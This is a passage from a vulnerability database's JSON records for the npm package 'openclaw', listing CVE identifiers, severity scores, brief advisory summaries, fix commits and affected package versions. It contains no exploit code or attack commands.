:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T17:21:33Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-r6xh-pqhr-v4xh"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44118","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44118"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-owner-context-spoofing-via-bearer-token-header","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T17:21:33Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-owner-context-spoofing-via-bearer-token-header"},{"reference_url":"https://github.com/advisories/GHSA-r6xh-pqhr-v4xh","reference_id":"GHSA-r6xh-pqhr-v4xh","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-r6xh-pqhr-v4xh"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114466?format=json","purl":"pkg:npm/openclaw@2026.4.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-ye4t-n6r3-67ab"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.22"}],"aliases":["CVE-2026-44118","GHSA-r6xh-pqhr-v4xh"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ry1r-br3q-2uaw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89294?format=json","vulnerability_id":"VCID-s3wz-3yzf-ybhz","summary":"OpenClaw: Voice-call Plivo replay mutates in-process callback origin before replay rejection\n## Summary\nVoice-call Plivo replay mutates in-process callback origin before replay rejection\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: low\n- Assessment: v2026.3.28 can still mutate Plivo callback origin before replay rejection, but this needs a captured valid callback for a live call so medium is overstated.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `efe9183f9d2fd5e01c8068fa01f4a07a58a63c0b` — 2026-03-31T19:50:35+09:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @zsxsoft for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41337","reference_id":"","reference_type":"","scores":[{"value":"0.00037","scoring_system":"epss","scoring_elements":"0.11472","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00037","scoring_system":"epss","scoring_elements":"0.11506","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00037","scoring_system":"epss","scoring_elements":"0.11508","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41337"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/efe9183f9d2fd5e01c8068fa01f4a07a58a63c0b","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T14:28:16Z/"}],"url":"https://github.com/openclaw/openclaw/commit/efe9183f9d2fd5e01c8068fa01f4a07a58a63c0b"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-89r3-6x4j-v7wf","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T14:28:16Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-89r3-6x4j-v7wf"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41337","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41337"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-callback-origin-mutation-in-plivo-voice-call-replay","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T14:28:16Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-callback-origin-mutation-in-plivo-voice-call-replay"},{"reference_url":"https://github.com/advisories/GHSA-89r3-6x4j-v7wf","reference_id":"GHSA-89r3-6x4j-v7wf","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-89r3-6x4j-v7wf"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41337","GHSA-89r3-6x4j-v7wf"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-s3wz-3yzf-ybhz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91442?format=json","vulnerability_id":"VCID-s4s8-8qea-q3fd","summary":"OpenClaw: Bonjour/DNS-SD TXT metadata steers CLI routing after failed service resolution\n## Summary\nBonjour and DNS-SD TXT metadata could still steer CLI routing even when actual service resolution failed, allowing unresolved hints to influence the chosen target.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `deecf68b59a9b7eea978e40fd3c2fe543087b569`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/infra/bonjour-discovery.ts now resolves and returns only concrete endpoints instead of falling back to unresolved TXT host and port hints.\n- src/cli/gateway-cli/discover.ts consumes only the fail-closed resolved endpoint path.\n\nOpenClaw thanks @nexrin for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35659","reference_id":"","reference_type":"","scores":[{"value":"7e-05","scoring_system":"epss","scoring_elements":"0.00688","published_at":"2026-06-06T12:55:00Z"},{"value":"7e-05","scoring_system":"epss","scoring_elements":"0.00687","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35659"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T16:58:41Z/"}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/deecf68b59a9b7eea978e40fd3c2fe543087b569","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T16:58:41Z/"}],"url":"https://github.com/openclaw/openclaw/commit/deecf68b59a9b7eea978e40fd3c2fe543087b569"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rvqr-hrcc-j9vv","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T16:58:41Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rvqr-hrcc-j9vv"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35659","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35659"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-unresolved-service-metadata-routing-via-bonjour-and-dns-sd-discovery","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T16:58:41Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-unresolved-service-metadata-routing-via-bonjour-and-dns-sd-discovery"},{"reference_url":"https://github.com/advisories/GHSA-rvqr-hrcc-j9vv","reference_id":"GHSA-rvqr-hrcc-j9vv","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rvqr-hrcc-j9vv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"v